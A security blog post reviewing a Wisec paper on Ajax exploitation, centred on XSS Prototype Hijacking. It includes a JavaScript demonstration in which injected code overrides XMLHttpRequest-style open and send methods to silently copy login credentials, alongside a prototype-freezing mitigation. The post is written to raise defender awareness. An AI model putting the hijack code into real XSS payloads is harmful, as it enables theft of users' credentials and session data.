I have been reading an interesting paper from Wisec (Italy), who presented work on an exploitation framework for Ajax and Web 2.0 applications.
The link to the paper is here, the link to Wisec is here, and it makes for some interesting reading.
The premise of the framework is:
Ajax problems are present on both the client side and the server side, and can be classified as follows:
1. System Architecture;
2. Authorization and authentication;
3. Client/Server communication;
4. Management of communication (usually XML);
5. Client and Server are not trusted.
These are all fairly standard issues that most web application penetration testers will attempt to subvert when dealing with normal web applications. What makes Ajax more interesting is when you can move pieces of JavaScript around because the site owner has made the web root writable by everyone, or even better writable and executable by everyone (chmod 777 on UNIX; Windows has no octal modes, but an Everyone: Full Control ACL amounts to the same thing), just to get some application working at all.
While most web applications, or web-enabled applications, share many common issues, a full Ajax exploitation framework, along the lines of the Metasploit Framework or commercial web application testing tools such as SPI Dynamics WebInspect, is becoming more and more necessary, because many information security people do not have the skill set to properly assess the ramifications of some Ajax implementations.
The attack Wisec proposes, called XSS Prototype Hijacking, goes like this:
“XSS Prototype Hijacking – A new advanced technique to gain total control over an Ajax application will now be described. This attack is based exclusively on some of the intrinsic properties of prototype languages like JavaScript. Prototype-based programming is a style of object-oriented programming where classes are not present; indeed, objects are cloned from already existing objects (native objects) or created from scratch (empty objects). Eventually, new methods or attributes belonging to an object can be created or reimplemented by simply defining them.” (Wisec)
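To make the quoted idea concrete, here is an added example of what prototype hijacking looks like in code. It is not code from the Wisec paper or from the original post. Because XMLHttpRequest does not exist outside a browser, makeXHR() builds a constructed stand-in with the same open/setRequestHeader/send shape; the hijack function itself is what an injected script would do to the real XMLHttpRequest.prototype, and the protectPrototype() hardening and the login URL and credentials are assumptions made for the example.

```javascript
// Added example: XSS Prototype Hijacking against an Ajax client.
// Not from the Wisec paper or the original post. XMLHttpRequest is not
// available under Node, so makeXHR() returns a constructed stand-in class
// exposing the same open/setRequestHeader/send methods. A fresh class is
// built per call so each run starts from an unmodified prototype.
'use strict';

function makeXHR() {
  class XHR {
    open(method, url) { this._req = { method, url, headers: {} }; }
    setRequestHeader(k, v) { this._req.headers[k] = v; }
    send(body) { this._req.body = body; return this._req; } // stands in for the network call
  }
  return XHR;
}

// Attacker's payload, delivered through an XSS flaw in the application.
// In a prototype-based language any script can redefine a method on a
// shared prototype; every object created afterwards (and every existing
// one, since method lookup is dynamic) now runs the attacker's wrapper.
// The wrapper forwards to the original so the application keeps working.
// Returns true if the hooks were actually installed.
function hijackPrototype(XHR, exfil) {
  const origOpen = XHR.prototype.open;
  const origSend = XHR.prototype.send;
  const hookedSend = function (body) {
    exfil({ method: this._hj.method, url: this._hj.url, body }); // siphon credentials/tokens
    return origSend.call(this, body);
  };
  try {
    XHR.prototype.open = function (method, url, ...rest) {
      this._hj = { method, url }; // remember the target for the send hook
      return origOpen.call(this, method, url, ...rest);
    };
    XHR.prototype.send = hookedSend;
  } catch (e) {
    // In strict mode, assigning to a frozen prototype throws a TypeError;
    // in sloppy mode it fails silently. Either way the identity check below
    // tells us whether the hook took.
  }
  return XHR.prototype.send === hookedSend;
}

// Hardening (an assumption for this example, not from the paper): freeze the
// prototype before any untrusted script can run. This blocks redefinition of
// the methods, but it does not remove the XSS, which is the real bug.
function protectPrototype(XHR) {
  Object.freeze(XHR.prototype);
  return Object.isFrozen(XHR.prototype);
}

// The application's legitimate login call, written with no knowledge of the
// hijack. The URL and credentials are constructed for the example.
function appLogin(XHR, user, pass) {
  const xhr = new XHR();
  xhr.open('POST', '/api/login');
  xhr.setRequestHeader('Content-Type', 'application/json');
  return xhr.send(JSON.stringify({ user, pass }));
}

// Runs the attack against an unprotected or a frozen prototype and reports
// whether the hook installed, what the attacker captured, and what the
// application's own request looked like.
function demo(freezeFirst) {
  const XHR = makeXHR();
  const captured = [];
  if (freezeFirst) protectPrototype(XHR);
  const hooked = hijackPrototype(XHR, (r) => captured.push(r));
  const result = appLogin(XHR, 'alice', 'hunter2');
  return { hooked, captured, result };
}

console.log(JSON.stringify(demo(false), null, 2)); // hooked: true, one captured POST
console.log(JSON.stringify(demo(true), null, 2));  // hooked: false, nothing captured
```

Note that the application's request still goes through normally in the hijacked case; nothing visible breaks, which is what makes the attack attractive. Freezing the prototype is a defence in depth measure only, since an attacker who can run script in the page has many other ways to read the same data; the fix is to close the XSS hole.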
Security folks are behind the power curve on issues like this, and more training is needed so that they are aware of what is happening in the world of Ajax. As better and better write-ups of these exploits appear, and as real exploits are released like the ones against MySpace and Yahoo, security folks should be testing for these kinds of issues, or at least reading the papers and working with developers to raise the level of awareness on both the security and development teams.
For anyone responsible for Ajax security, and for Ajax developers, this paper just became a must-read: the implications of certain implementation choices are already being studied by hackers and by people who want to own your web site.
Dan Morrill has been in the information security field for 18 years, both civilian and military, and is currently working on his Doctor of Management. Dan shares his insights on the important security issues of today through his blog, Managing Intellectual Property & IT Security, and is an active participant in the ITtoolbox blogging community.